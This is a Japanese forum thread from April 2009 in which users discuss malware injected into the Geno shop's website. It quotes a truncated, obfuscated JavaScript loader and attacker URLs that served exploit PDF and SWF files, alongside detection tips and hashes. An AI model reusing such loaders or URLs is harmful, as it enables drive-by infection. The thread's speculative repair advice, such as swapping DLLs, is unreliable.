【注文0.1】Genoのサイトでウイルス感染…か?★2
572 :
姫カンムリシャジン(北海道) :
2009/04/05(日) 17:30:38.90 ID:SJFT5u/E genoのサイトを開くと以下のURLが呼ばれるんだが 94.247.2.195/news/?id=100 (IEの場合こっちが呼ばれる) 94.247.2.195/news/?id=101 (それ以外の場合こっちが呼ばれる) うちの環境ではどちらを開いても以下のコードしか出てこない。 // No news...<script> var t=new Date(1148027392000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/"; //</script> ただcookieを書き込んでるだけ。よって何も起こらない。 しかしどうも前スレの報告によると、このURLにPDFやswfをダウンロードさせるコードが含まれてる場合もあるみたいなんだよな。 とりあえずうちでは攻撃が確認できないので、これ以上の解析は無理だ
573 :
リナリア アルピナ(福岡県) :2009/04/05(日) 17:35:03.91 ID:cH/yn/ac
とりあえずルーターでIPフィルタかけてみたら やっぱりゲノのサイト繋がらないね まさかラトビアの鯖借りてるワケでもなかろうに・・・
574 :
ウグイスカグラ(愛知県) :2009/04/05(日) 17:35:49.93 ID:cloa20iA
ウインドウズが起動しなくなってしまった 窓の画像出て読み込んでるところまでは行くんだが どうすればいいの?;;
575 :
リナリア アルピナ(福岡県) :2009/04/05(日) 17:41:10.09 ID:cH/yn/ac
576 :
エニシダ(群馬県) :2009/04/05(日) 17:42:04.31 ID:Ca48GkkG
くそーー 感染してるか分からんからネットショッピングとかパス必要なこと一切できないじゃん! 誰か早く詳細を!
577 :
キバナスミレ(関東・甲信越) :2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570 アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた
>>577 二行目でアウトだが
conimeはコマンドプロンプト開いたら一緒にあがってくるものだぞ
>>577 cmdで日本語つかうならconime.exeは動くっしょ
>>572 94.247.2.195/news/?id=100 のソースは
<script>
var a=new Array(43,38,13,7,25,1,60 長いので以下略
);eval(unescape('85cvaSUr%20sHFZ%3D"HFZ",k%3D 長いので以下略
cs);').replace(/Eu|SU|zbn|HFZ|85c|G7x|4Nr|Z0/g,""));
//</script>
ってなってる。
これを解読すると
・94.247.2.195/news/?id=2 をPDFとして開く
・94.247.2.195/news/?id=3 を開く
になる。というのは前スレ207で報告したとおり。
ユーザエージェントによって中身を切り替えてるんかね
>>577 詳細感謝。
ってことは上でも言われているようにconime.exeが動いているかどうかで感染が判断できそうだな。
582 :
キバナスミレ(関東・甲信越) :2009/04/05(日) 17:47:06.31 ID:vha5s7Cg
しかし再インスコめんどいな メーカー製PCのリカバリディスクからXPSP3適用済みのインストールCD作る方法ないのかな 余計なソフトとか全部省いてOSだけのやつ
583 :
シキミ(東京都) :2009/04/05(日) 17:47:36.84 ID:jJAIwFLg
>>571 なるほど、ドア通る時に悪さするんじゃなく中に入っちゃってんのか
584 :
キキョウソウ(アラバマ州) :2009/04/05(日) 17:49:01.33 ID:uH6xtuH4 BE:1517819459-DIA(109092)
これがキーロガーだったらOS再インスコしたところで後の祭りだよね
ここは感染するのを楽しむスレだろ? 俺も感染した
カスペならオンラインウィルススキャンでも検知できる?
587 :
キバナスミレ(関東・甲信越) :2009/04/05(日) 17:50:43.99 ID:vha5s7Cg
>>578-579 cmd.exeはその時点で落ちてたんだけど、cmd.exe終了してもconime.exeのプロセスは残るのかな
conime.exeは問題ないだろ
589 :
藤(catv?) :2009/04/05(日) 17:51:44.77 ID:G3IZnl5U
conime.exeは、起動後初めてコマンドプロンプトでIMEを有効にした瞬間に起動する cmd.exeを閉じても残る
やったreader9.0入手したから感染できた。
>>587 残るんでタスクマネージャーから終了させるといい
593 :
オニノゲシ(コネチカット州) :2009/04/05(日) 17:54:18.05 ID:etNvZp7q
avastならセーフなのか ノートン解雇してavast雇用してスキャンするか。
594 :
キバナスミレ(関東・甲信越) :2009/04/05(日) 17:54:24.94 ID:vha5s7Cg
>>581 cmd.exe立ち上げた覚えないのにconimeが動いてたらアウトだろうね
感染の段階で裏でcmd.exe立ち上がるっぽい
やった感染できた
596 :
キソケイ(愛知県) :2009/04/05(日) 17:54:39.18 ID:Vw4dvWvo
genoまだなんも対応してねーの?
こいつは感染したPCのフォルダとかデータとか、差したUSBメモリのAutorun.infに何か悪さするウイルス? そうじゃないならファイルを外付けHDDに退避させてリカバリでおkだよね。
やっぱりなんともない俺のメインPC XPでアクロバット5.0
どういうタイプのウィルスかわかってないあたりすげぇな まさに未知子
601 :
姫カンムリシャジン(北海道) :2009/04/05(日) 17:57:53.61 ID:SJFT5u/E
>>580 一応Win2k上でIEとFirefox、UA偽装してIE7 on WinXPを試してみたんだけど
どれも同じ結果しか返って来ないんだよな…
ランダムに返してるわけでもないだろうし、謎。
かってにconime.exe動いてた。アウトっぽい 火狐とAdobeをアンインストして、フォルダも全部削除してから、 火狐とFoxitを再インストールしたらconime.exe出なくなった
やけにFOX落ちるなっておもたら、ウィルスですかい 大丈夫なんかね
バックアップ取るためにいらないファイル消してたら いきなりデータ実行防止が働いてexplorer.exeが落ちた ついでにdrwtsn32もエラー落ち なんだかオラワクワクしてきたぞ
605 :
ショウジョウバカマ(神奈川県) :2009/04/05(日) 18:00:53.91 ID:2VNVFXU0
NoScriptの偉大さがやっと理解できた
>>572 ただのテキストにアクセスしてるわけじゃないんだし呼び出し元の状況で幾らでも書き換えできるだろ
ネットにアクセスする時は、vmwareにインストールしたバーチャルPCから アクセスしてるから全然怖くないけどなw
609 :
キバナスミレ(関東・甲信越) :2009/04/05(日) 18:05:44.51 ID:vha5s7Cg
>>602 conime.exe自体は悪さしてないと思うよ
感染の段階で裏でcmd.exeが動くんで、一緒にconime.exeが立ち上がってそのまま残ってるだけじゃないかな
実際俺は再起動しただけでconimeは消えたよ
610 :
タンポポ(神奈川県) :2009/04/05(日) 18:06:08.12 ID:Lu9lgr48
NoScript入れてたけど、genoを許可してたから意味ねぇw
システムの復元をしたら、削除したはずの思い出のファイルが蘇ったんですが…
XPならデフォで起動時にautoexec.batを処理してるから 殆どの人にconime.exeは残るんじゃね?
?id=100の時は // No news...<script> var a=new Array(51,42,(以下コードがずらす゜らと… ?id=101の時は // No news...<script> var a=new Array(32,24,(以下コードがずらす゜らと… id=xxxでいろんなパターンがあるようでつ
感動のシチュエーションですね。
>>608 仮想PCでも情報は抜かれるわけだが
ID/パスワードを使うアクセスは一切してないのか
すごいな
617 :
トウゴクミツバツツジ(アラバマ州) :2009/04/05(日) 18:07:57.56 ID:n5OR5dmj
システムの復元ってデスクトップも元に戻るのか…。
>>617 そのソフトウェア、もしかしてウィルスじゃ……。
感染してる場合って、どのプロセスが94.247.2.195と通信するの? 感染してるっぽい人は、管理者権限でコマンドプロンプトを開いて、 netstat -fb してみてくれないかな?
>>587 残るよ。いったんシェル立ち上がると、てめーできるまでそのexeは生きてる。
まあなんのシステムも消費せずひっそりとしてるだけだけど。
びびるようなものではない
どうやらXPのみでおこってるらしい?
623 :
キキョウソウ(アラバマ州) :2009/04/05(日) 18:11:35.12 ID:uH6xtuH4 BE:944420674-DIA(109092)
>>616 常用してる奴はそうだろうけど、
砂箱的な使い方してる奴なら問題無いだろ?
624 :
エニシダ(群馬県) :2009/04/05(日) 18:12:51.89 ID:Ca48GkkG
C:\に何か変なファイルがなければ大丈夫っぽいな
626 :
キバナスミレ(関東・甲信越) :2009/04/05(日) 18:15:55.91 ID:vha5s7Cg
>>620 今はリカバリ中だから調べられないけど、踏んだ直後に-anoオプションでプロセスID見たら、IEだったよ
というかIDとかパスワードって何かのログインするときに入力しただけだろ? その情報とかってレジストリに残るものなの普通?
629 :
トウゴクミツバツツジ(アラバマ州) :2009/04/05(日) 18:16:34.57 ID:n5OR5dmj
>>624 XPで管理者権限のあるユーザーでログインしているなら、コマンドプロンプトを
開いて、netstat -fb[Enter]って打つだけ。
Vistaなら、[スタート]メニュー → [アクセサリ] → [コマンドプロンプト]で
右クリックして「管理者として実行(A)...」を選択
>>626 IEっすか。んじゃIP以外で判別付かないのね。
>>609 再起動しても、火狐立ち上げる毎にconime.exeが出てきていたぞ
>>629 そこにあるhxxp://94.247.2.195/news/?id=のどれか忘れたけど踏んだら「iNo.exeをどうするよ?」
と火狐がたずねてきた。
634 :
タチイヌノフグリ(東京都) :2009/04/05(日) 18:23:40.64 ID:97/10VKe
os9&wamcomで踏ん付けたら、ブラウザ終了させてもメモリー開放されなくなった ブラウザ入れ直したら直ったけど、まさかこの環境でも抜かれたり…
636 :
ハナカイドウ(三重県) :2009/04/05(日) 18:29:01.39 ID:gN5GNh7a
誰かVIPにスレ立てた? あいつら釣れるんじゃね
>>630 XP の netstat に f なんてオプション無いぞ!!
昨日知らずにGenoチェックしたけどなんとも無かった Firefox使ってるやつは、最低AdbrockとNoScriptぐらい入れとけば?
639 :
藤(神奈川県) :2009/04/05(日) 18:31:08.30 ID:7VElRfeM
>>635 ん?なんか変?
名前解決できなければIPで表示されるはずだけど。
hosts書き換えられたりしてる可能性を考慮して、-nbとかの方がいいのかな。
>>639 レス数伸びてないな…
「デジカメに詳しい奴ちょっと来い」で立てたほうがよかったかもね
642 :
ハナカイドウ(三重県) :2009/04/05(日) 18:33:21.48 ID:gN5GNh7a
>>637 すまん。んじゃnetstat -nbで
645 :
ハナカイドウ(三重県) :2009/04/05(日) 18:34:22.89 ID:gN5GNh7a
646 :
オオバクロモジ(埼玉県) :2009/04/05(日) 18:34:43.41 ID:Yh1MiCcT
647 :
藤(catv?) :2009/04/05(日) 18:35:50.70 ID:G3IZnl5U
これゲノは対策とか発表まだしてないの?一回だけ踏んですぐ閉じたがなんか 調子悪い。さっき急にブルースクリーンになって強制終了させた。マジでどうしたら いいんだよ
>>646 ヒュースなんちゃらで疑わしいのも拾うらしいな。
判断が厳しいってだけでしょ。
今回のような場合は頼もしいじゃん。
>>638 別にそんなものいれてないがなんともなかった
94.247.2.195/news/?id=10のLk8.exeって何
LUNAで一瞬見たけど 1分程度だがなんともないんだが 症状として 重たくなるとかぐらいなのか
653 :
モリシマアカシア(長崎県) :2009/04/05(日) 18:38:30.71 ID:cq05hwJO
zip猿共がウザいから短縮URLでブラクラ踏ませるぞー
654 :
エニシダ(群馬県) :2009/04/05(日) 18:39:17.28 ID:Ca48GkkG
>>644 やって見たんですけど
どういう画面だと危険なんですか?
なんかアクティブコネクションとか英語で出て
その下にローカルアドレスとか似たような文章が何行かに渡って表示されてますけど・・・
Vistaの場合リソースモニターでどのプログラムがどこと接続してるか見れるぞ
>>654 外部アドレスに94.247.2.195があったら感染してるっぽい。
XPだとForeign Addressだったかな。
で、その下あたりに[xxx.exe]って通信を行っているアプリ名が出てるはずなので、
もし、94.247.2.195と通信してるようなら、そのアプリ名を教えて。
657 :
トウゴクミツバツツジ(アラバマ州) :2009/04/05(日) 18:46:17.17 ID:n5OR5dmj
108lv.exeだったら許した
660 :
タツタソウ(埼玉県) :2009/04/05(日) 18:48:42.55 ID:KVAjhyIK
ファイル名はランダムに変化するのかな そういう手法はウイルスバスターも使ってた気がするが
661 :
モリシマアカシア(長崎県) :2009/04/05(日) 18:50:03.58 ID:cq05hwJO
>>415 それのスキャン4種類あるみたいだけど、どれでしたら出てきた?
NIS2009 トレンドマイクロ オンラインスキャン でなにも検出せず いまavast最新版でスキャン中なんだけど kernel32.dll winsock.dll wsock32.dll この3個検出して隔離されたんだけど これ必要なもんじゃねーの?
664 :
オオバクロモジ(埼玉県) :2009/04/05(日) 18:52:07.03 ID:Yh1MiCcT
665 :
モリシマアカシア(長崎県) :2009/04/05(日) 18:53:31.89 ID:cq05hwJO
>>664 まー、フルスキャンが確実だ罠
面倒だけど背に腹は代えられないからやってみっか
666 :
ボタン(栃木県) :2009/04/05(日) 18:53:35.27 ID:V3xzTNi/
667 :
タツタソウ(埼玉県) :2009/04/05(日) 18:53:43.92 ID:KVAjhyIK
>>662 System32でなければ偽物の可能性が高いけど、場所は?
668 :
桜(関西地方) :2009/04/05(日) 18:53:53.93 ID:ymNAsLvk
最新版のマカフィーでフルスキャン中だけど、なんにも出てこない・・・ マジでどうしたらいいんだ
>>662 複数検出されて、本来あるべき以外の場所にあったらウィルスかもな。
どうしようもないよ 何もしなくていい
673 :
サルトリイバラ(catv?) :2009/04/05(日) 18:56:42.25 ID:WKOfMQMT
>>670 さっさとデータ逃がしてクリーンインスト
メモリのベンチテストでも勝手にされてるかと思ったわ
新型おそるべし。セキュリティ使ってる人の方が 安心してしまって自己防衛せず、やられてるんだろうね。 バスター・ノートン今だ対応できず。カスペも検知はできるが駆除はまだ。
678 :
福寿草(宮城県) :2009/04/05(日) 19:00:04.84 ID:c0Xz79rE
これってAdobe Readerが怪しくね? 仮想マシンで試したらAdobe Readerインストールする時点でAviraが騒ぎ出すんだが・・・まぁこれはこれは誤検知だよな さらにgeno-webにアクセスするとAviraは無反応、糞重い。そしてOSの挙動が不審に。 ちなみにAdobe Readerインストール前にgenoにアクセスしても実害はなかった模様
679 :
藤(神奈川県) :2009/04/05(日) 19:01:21.31 ID:7VElRfeM
>>662 そのファイルが汚染されてるってことはないのか?
Adobe Readerは入れてないからセフなんだけどFlashでもやられるんだよな、FlashPlayerの最新版ていまはいくつ? ていうか、最新版なら感染なしなのか? とりあえずカスペでCドライブからは何も検出されなかったけど…
681 :
桜(関西地方) :2009/04/05(日) 19:01:47.90 ID:ymNAsLvk
>>675 dllに感染してるんじゃないの
とっとと再インスコした方が幸せになれると思うが
avastアップデート&スキャン リーダー&フラッシュをアップデート ATFクリーナー使用 プロセス数38 conime無し メモリ使用量550MB 挙動に異常なし 終わったのか? 頭がおかしくなりそうだぜ
>>678 >ちなみにAdobe Readerインストール前にgenoにアクセスしても実害はなかった模様
この時点でなんか仕込まれて
>仮想マシンで試したらAdobe Readerインストールする時点でAviraが騒ぎ出すんだが・・・まぁこれはこれは誤検知だよな
この段階で発動した可能性は?
感染してるdll捨てて代わりのdllを他の人から貰うなりして入れても駄目なもんなの?
685 :
福寿草(宮城県) :2009/04/05(日) 19:04:29.06 ID:c0Xz79rE
>>683 Adobe Readerインストールする前はgenoにアクセスしてないよ!
参考までに PDFのやつ MD5:af28f3bc9424a3da7ff8bc84740bce93 SHA1:c96f0e74a9adb446e233bfb94fe1bfc11bc5e49b Flashのやつ MD5:f2cbb3bd0abc2413000f5b04f8bf3305 SHA1:5adcf9a489c85ef1065b515c5772f21225a5e4c7
689 :
藤(神奈川県) :2009/04/05(日) 19:08:20.64 ID:7VElRfeM
>>662 それはチェストにバックアップされたシステムファイル。
「感染していたファイル」カテゴリを選択してみ。
firefox 3, flash 10, foxit reader 3.0 build 1300くらい, NOD32で見たけど、 a square freeで検出されなかった。感染してないっぽい。
>>683 それはgetPlusのnp_gp.dlだろ。
んなことよりFLASHは関係なくね?
だれも電話で知らせてないの??
カスペで検知できない・・・・・・だ・・と??
695 :
ウグイスカグラ(愛知県) :2009/04/05(日) 19:17:41.79 ID:cloa20iA
セーフモードでも立ち上がらん・・・ 別のHDDにOSインスコしてウイルススキャンしても発見できない。 どうしよう;;;;;;
696 :
タツタソウ(埼玉県) :2009/04/05(日) 19:17:45.06 ID:KVAjhyIK
今回アクセスしていない人も、ここで一度でも商品を買った人は 個人情報がばら撒かれる可能性が高いからね
>>690 感染していたファイルにはありませんでした
ただのバックアップですか?
具合悪いようならdllいれかえてみます
早とちりスイマセン
699 :
トウゴクミツバツツジ(アラバマ州) :2009/04/05(日) 19:20:33.90 ID:n5OR5dmj
所で、a square freeの右栗スキャンで、g0N.exeをスキャンしても無反応なんやが なんでだろ。無論定義等は最新。VirusTotalで使ってるのと違うのかな。
>>695 もうあきらめて、そのクリーンインスコしたOSをつかったら?
ディスク見えてるようだからデータの引き上げとかもできるでしょ
701 :
藤(中部地方) :2009/04/05(日) 19:22:59.88 ID:W64d5sPe
マカフィー最新版フルスキャン完了。やっぱりなんにも出てこない・・・ ゲノはなんでなんにも発表とかしないんだ?
703 :
オキナグサ(アラバマ州) :2009/04/05(日) 19:24:50.68 ID:kvkquIi3 BE:243672-PLT(14437)
>>702 最初からウイルスなんて無かったんだよ
まだわからんの?
>>702 管理者へ連絡していないんだろうな
秋葉の店員も危機管理意識が全くないみたいだから
ネットショップの管理者も同じなんだろう
705 :
キソケイ(愛知県) :2009/04/05(日) 19:26:14.26 ID:Vw4dvWvo
家電量販店でかったPCって普通インストールディスク付いてないものなの?
706 :
タツタソウ(長崎県) :2009/04/05(日) 19:26:39.07 ID:uF8Fh66+
やっぱスクリプトは普段から来ておくべきだな 改めて思い知ったよ
707 :
タツタソウ(長崎県) :2009/04/05(日) 19:30:15.35 ID:uF8Fh66+
オォーィオイオイオイ、はよなんとかせーやゴエロ(若本規夫ボイス)
709 :
エニシダ(群馬県) :2009/04/05(日) 19:33:23.88 ID:Ca48GkkG
>>656 94.247.2.195とは出てません。
感染してないと言うことでしょうか?
俺もgeno除いたけどセフセフだったから傍観気取ってたけど 今日、別のウィルス踏んでハードディスクがフォーマットされてしまったでござる
>>705 最近のPCはHDDに格納されてる、リカバリディスクは有料だとか
結局ウイルスの挙動の全容もよくわからん GENOひらいたらAcrobatやFlashをオーバーフローさせて、任意のコードを実行 その後94.247.2.195と通信 それでどうなるんだ?再起動してもプロセス常駐したりはしないんでしょ?
GENOからなんの連絡もないんだけど、買い物とか登録してないとダメかね?
感染したからリカバリしようと思ってリカバリDVD出したら・・・・ 犬がDVD思いっ切りかじりやがった!
717 :
リナリア アルピナ(福岡県) :2009/04/05(日) 19:41:21.73 ID:cH/yn/ac
そんなことより明日の体育で使うオレの体操着にウチのネコがウンコした件について
春休みだろ
>>630 これやったら
こんなのでたけどIPとかかかれてないけどこれセフセフ?
アクティブな接続
プロトコル ローカル アドレス 外部アドレス 状態
個人情報漏れても大事にはならなくないか PCの重要ファイル漏れるとやばいけど
っていうかどこかからアクセスしてくるってどうやってわかるんだ? ファイヤーウォールか何かか?
722 :
藤(神奈川県) :2009/04/05(日) 19:45:54.55 ID:7VElRfeM
723 :
オオバクロモジ(埼玉県) :2009/04/05(日) 19:46:04.98 ID:Yh1MiCcT
踏んでないけど寂しいから俺もOS再インストールするよ
トレンドマイクロに一応報告してきた
avast!が 94.247.2.195 への通信を遮断しました と出したな なんかこんな風に機能したのって始めてかもしれん ちゃんと動いてたんだなこれ
誰かが言ってたように漏れたらまずい情報をPC上に置かない事が最強のウイルス対策か
>>727 P◯P専用機とかなら分かるが普段使ってるWEB機じゃそれは難しい
730 :
ウバメガシ(dion軍) :2009/04/05(日) 19:55:25.39 ID:sqUa3kEW
>>727 普通置いてないだろ?
各種パスは紙に書くし、パスワード記憶とかも使わないし。
ネット閲覧を抑制するのが一番いい。お前らは一日中とかやりすぎなんだよ
とりあえずavastで遮断してくれた人は勝ち組ってことで?
732 :
イベリス・ウンベラタ(徳島県) :2009/04/05(日) 19:57:08.78 ID:qBMLTRpS
VisualStudio2008のインストールとかにめちゃくちゃ時間かかるのに 再インストールとかやってらんないんだけど。。。 マジ、やってらんねー。
733 :
ウバメガシ(dion軍) :2009/04/05(日) 19:59:25.18 ID:sqUa3kEW
>>661 俺の場合、expert pdfかjane styleがある
program files03か05か04だけスキャンしたら出てきた。たしか
windowsフォルダとかはやってない
すぐ駆除しちまったから、詳しいことは忘れちゃった。
734 :
ビオラ(コネチカット州) :2009/04/05(日) 20:01:12.01 ID:5oCgOlcJ
ところで誰を訴えればいいの?
735 :
スカシタゴボウ(静岡県) :2009/04/05(日) 20:02:10.80 ID:GCfDmmEM
マルウエアがどうのこうのって出たな
736 :
タチイヌノフグリ(愛知県) :2009/04/05(日) 20:02:46.52 ID:LS/H8DZ8
週間アスキーとか新聞広告出してなかったかここ? ホントにウイルスならやばくね????
まだ直らないの? XPのDSP買いたいんだから早くしてよ
IPアドレス 94.247.2.195 ホスト名 hs.2-195.zlkon.lv IPアドレス割当国 ラトビア ( lv ) ラトビアはバルト三国の一つ
739 :
プリムラ(兵庫県) :2009/04/05(日) 20:04:12.48 ID:RkZIlGLA
お前ら無様過ぎだろw やはりノーガード最強だなwwwww
740 :
ボタン(宮城県) :2009/04/05(日) 20:05:46.12 ID:9Sinp90Q
>>656 おー、ロクにアップデートもしない状態で偽装jpg踏んじゃって
あせったけどセーフだったか
今日からマメに更新するわ
genoはどう対応するんだろ
742 :
節分草(catv?) :2009/04/05(日) 20:06:33.47 ID:XV6tShH1
avastを入れた人いる?
なかったことにするだけだろ
>>741 これ幸いとノートンとバスターの安売りするんじゃね?
745 :
藤(神奈川県) :2009/04/05(日) 20:08:54.62 ID:7VElRfeM
>>742 今回のような事態にあったら怖いので入れた
まだGenoのサイトは直ってないの?
747 :
イベリス・ウンベラタ(徳島県) :2009/04/05(日) 20:09:31.73 ID:qBMLTRpS
>>743 もしそうだったら、客を馬鹿にしてるとしか思えない。
FDDしか買ったことないけど。
748 :
ボタン(宮城県) :2009/04/05(日) 20:10:18.93 ID:9Sinp90Q
617 名前: 名無しさん [sage] 投稿日: 2009/04/05(日) 20:05:12 0 ご迷惑をお掛けして申し訳ありません。 今回の件は原因を調査中です。 ただ、ウイルスでは無いので騒がなくて良いです。 これ本物かな? これだけ放置して騒がなくて良いって・・・
avastたんはいい子
こっちにもavast一個たのんます
黄色い先生も撃退してくれたぞ(´・ω・`)
ESETはどうだろうか
avastからantivirに変えたけどまたavastに戻る日が来ようとは
ノートンとバスターのシェアを奪いたい勢力の策略か 最も利益を受けるのは誰か なぜ土曜の朝にGenoなのか
これはどうみてもウイルス しかもかなり性質の悪い 今の状況でGENOで買い物どころかアクセスするのはNG これで明日になっても謝罪文一つ出さないで通常営業するとしたら 然るべき機関へ通報したほうがいいね こんなに被害者を出しているんだから社会的制裁を受けるべき
756 :
タツタソウ(埼玉県) :2009/04/05(日) 20:20:36.26 ID:KVAjhyIK
>>754 そうか!Genoでウイルス対策ソフトを買えばいいんだ!!
どんな 症状がでるんだよ いっこうにわからん
758 :
チューリップ(アラバマ州) :2009/04/05(日) 20:21:05.20 ID:Y1zlrUm2
genoに行く服がない
avast最高だな アクロバットリーダーは起動したけど 固まったりしないわ
GENOはマカフィー売っていたよね? ちゃんと対応商品は売っているってこと?
761 :
サポナリア(神奈川県) :2009/04/05(日) 20:23:43.90 ID:0xYRMmSR
Vista SP1、IE7最新版、Flash最新版、Adobe Reader最新版で見たら 感染しないぞ
めったにないことかもしれないけどGENO最悪 しかも謝罪の文章もなし、これは店を構える上でやってはいけないこと うんと後から抗議されるよりも今の内に謝罪すべき ま、avast入れてた俺は勝ち組
ちょっと前まで マカフィーが888円 バスターが2999円で売っていた。
avastは、感染前に94.247.2.195を遮断してるのか、感染後に94.247.2.195を遮断してるのかどっちだ?
>>754 パソコン覚え立ての人が使うよく使うNorton/busterに検出駆除されてしまうような
ウィルス使う方がおかしいだろ、Jk
コマンドプロンプト開いて94.247.2.195と通信してなければおkって事?
>>760 マカフィー使ってたけど引っ掛かったって言ってる人いなかった?
999円だかで売ってたね
avastとantivir両方入れてる
>>758 こいつ馬鹿か
genoはネット通販だから外出る必要ないぞ
geno踏んだ後、 再起動したらタスクトレイの中身が極端に少なくなった。 ノートン先生も出てこねえ
またChromeの大勝利か
>>774 チョロメ組はその前に負けているw
IRONの一人勝ち
776 :
水芭蕉(北海道) :2009/04/05(日) 20:38:05.07 ID:7JaJB9sK
ID変わってるけど
>>572 です
その後UAを色々偽装して試した結果、ラトビアのサーバが攻撃コードを吐き出すのは
Windows 2000、XP (Me以前は試してない) に限定されるみたい。
Vista、Mac、Linuxに関しては
>>572 に書いたコードを吐くだけで、何も悪さをしない。
2kとXPに関してはIEとそれ以外のブラウザをサーバ側で判別、
それぞれに対して
>>580 のように攻撃用pdf/swfを呼び出す。
そんな仕様になっているっぽい
>>772 ちなみにノートン先生再インスコしてもだめ
もし復元ができなかったらあきらめてOS入れ直せ
778 :
マムシグサ(茨城県) :2009/04/05(日) 20:40:24.78 ID:ZsqI05SR
>>776 XPSP3
IE8
janeから開いたけどpdf、swfは出てこなかった
94.247.2.195/news/?id=2
780 :
ジョウシュウアズマギク(長屋) :2009/04/05(日) 20:45:00.35 ID:eYgQ49eq
貧乏人のXP厨涙目wwwwwwwwwwwwwwwww
>>776 ちょっとサブ機(vista)で踏んでこようとか思っちゃったじゃねーかw
782 :
サイネリア(東京都) :2009/04/05(日) 20:46:50.37 ID:Z9rJC4ry
93.184.71.21 踏んでないのになんかスロバキアと通信してるんだが
783 :
ナノハナ(長屋) :2009/04/05(日) 20:46:59.83 ID:wCjwU9cE
4月からバスターからウイルスキラーゼロに変えといてよかったよ。
オペラやスリッパ(だっけ)使ってる情弱どもざまあwwwwww 玄人はファイアフォックス一択
785 :
ローダンゼ(埼玉県) :2009/04/05(日) 20:49:38.60 ID:OriMR3ig
>>782 IPアドレス 93.184.71.21
ホスト名 um10.eset.com
IPアドレス割当国 スロバキア ( sk )
787 :
ハマナス(コネチカット州) :2009/04/05(日) 20:51:15.09 ID:uVA9mQjx
これって踏んだら外付けHDDもやばい?あと2階だから無線LANで繋げてたんだが1階にあるPCとかには危険ないの?
788 :
サイネリア(東京都) :2009/04/05(日) 20:51:30.11 ID:Z9rJC4ry
ああESETかサンクス
789 :
エニシダ(群馬県) :2009/04/05(日) 20:52:27.66 ID:Ca48GkkG
791 :
雪割草(千葉県) :2009/04/05(日) 21:09:10.01 ID:G7xhjdZ4
グーグルクロームは安全?
792 :
藤(神奈川県) :2009/04/05(日) 21:13:04.18 ID:7VElRfeM
793 :
スカシタゴボウ(静岡県) :2009/04/05(日) 21:14:32.99 ID:GCfDmmEM
クロームなんか使ってる奴バカだろ 何抜かれてるかわからん
Vista厨大勝利ってのはマジなんだろうな
795 :
ムシトリナデシコ(北海道) :2009/04/05(日) 21:17:26.47 ID:MzeVYkNj
>>779 ちょっと試してみたけどやっぱり攻撃コードを吐いてくるね
ただIE6 on 2k上でも読み込みに失敗していたようだから、jsは読み込んでもpdf/swfは読み込まないってことはあるかも
user agentがどうなってるか確認できる?
796 :
ジロボウエンゴサク(東京都) :2009/04/05(日) 21:19:46.89 ID:wHrlagvV
avastですら反応するのに・・・
797 :
カントウタンポポ(大阪府) :2009/04/05(日) 21:20:32.13 ID:ELJz1ZXf
798 :
パキスタキス(アラバマ州) :2009/04/05(日) 21:22:02.76 ID:fI6jsCMH
ここまで放置だと宣伝のためにわざとウイルス仕込んだ疑いがあるな
通信をコマンドぷろんとで確認したが特に怪しいことはしてなかった。最新のフラッシュとadobeだったからかお??
>>795 よくわからないけど、これのこと?
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Internet Explorer 8.0
Mozilla It's a Mozilla based browser
4.0 Mozilla Version
compatible Compatibility flag
Indicates that this browser is compatible with a common set of features
MSIE 7.0 Name :
Internet Explorer
Version = 7.0 (MSIE 8.0 in Compatibility View)
Windows NT 5.1 Operating System:
Windows XP
Trident Layout engine for the Microsoft Windows version of Internet Explorer.
4.0 version 4.0
.NET CLR 2.0.50727 .NET installed
Version : 2.0.50727
.NET CLR 3.0.4506.2152 .NET installed
Version : 3.0.4506.2152
.NET CLR 3.5.30729 .NET installed
Version : 3.5.30729
avast反応するけど、1発目は感染!?
802 :
ナニワズ(アラバマ州) :2009/04/05(日) 21:26:19.56 ID:yMf1kKpb
最近よくgenoスレ立ってたしな。
マゾ的には放置中のIE6を再度起動させてフリーズ中のIEをそのままにして netstat -nb してみたら、 ccSvcHst.exe が起動して 198.87.182.147 :80 につなげていた。こりゃかんけいないか。
806 :
コデマリ(千葉県) :2009/04/05(日) 21:30:24.46 ID:9Adf0bya
>>802 うんうん。
正直、最近不自然な位にGeno宣伝レスが多かった。
なんかその辺にもカラクリが在りそう。
ぶっちゃけ、あの程度の店の規模で
広告代理店を使ってネットで宣伝活動を行える余裕なんてない筈だし。
一見店側の工作員に見せかけたクラッカー集団の感染者拡大の為の似非宣伝レス活動って感じで。
相当計画的犯行なんだと思う。
あぁ、先生のかw 失敬
昨夜短縮URLで貼られまくってたから結構被害出てるかもな。
811 :
スズメノヤリ(愛知県) :2009/04/05(日) 21:35:06.09 ID:YhBqCRka
踏んでしまったサブ機(バスター最新)で検出されなかったんで、 a-squaredで調べたら高レベル危険度で検出。 ああマンドクセ しかも直ぐ入金したのに↓届かず発送メールも無い。 CPU C2D T7250、 Vista Businessの15.4型NEC製ノートPCが46000円
>>776 UAに
compatible; MSIE 7.0; Windows NT 6.0;
を送って
94.247.2.195/news/?id=100
をGETリクエストしてみたが、id=2とid=3への誘導コードが入ってたよ。
Vistaだからといって安心はできないんじゃない?
>>811 genoは平日でも入金から発送まで2日以上がデフォ&土日休む
で4/2(木)に注文したんなら月〜水あたりに発送だ
なんかこのスレいるだけで、アンチウイルスソフトの優秀さが比較できるな。 しかし、無料のavastが大勝利ってマカフィー使ってるのが悲しくなってくる
>>811 そりゃ心配だね、明日でも直接電話してみたら?
817 :
イヌガラシ(北海道) :2009/04/05(日) 21:42:03.42 ID:EePk2v0W
>>800 それ。
試してみたがやっぱり攻撃コードが返ってくるようだ。
まだコードをよく検証してないが明示的に読み込まれるわけではないかもしれないので気をつけた方がいいかも
で結局感染するとどうなるんだい?
819 :
スズメノヤリ(愛知県) :2009/04/05(日) 21:43:19.74 ID:YhBqCRka
もう踏んだり蹴ったりっすわ。 サブ機はwinも最新にしてて、変なサイトは絶対行かないマシンなんで、 ライセンス余ってたバスターでいいやって入れたらすり抜けちまってこれだよ。 感染上等のエロサーバーはavastで助かりやがるし・・・
820 :
シロイヌナズナ(京都府) :2009/04/05(日) 21:43:44.68 ID:eWJHWMwy
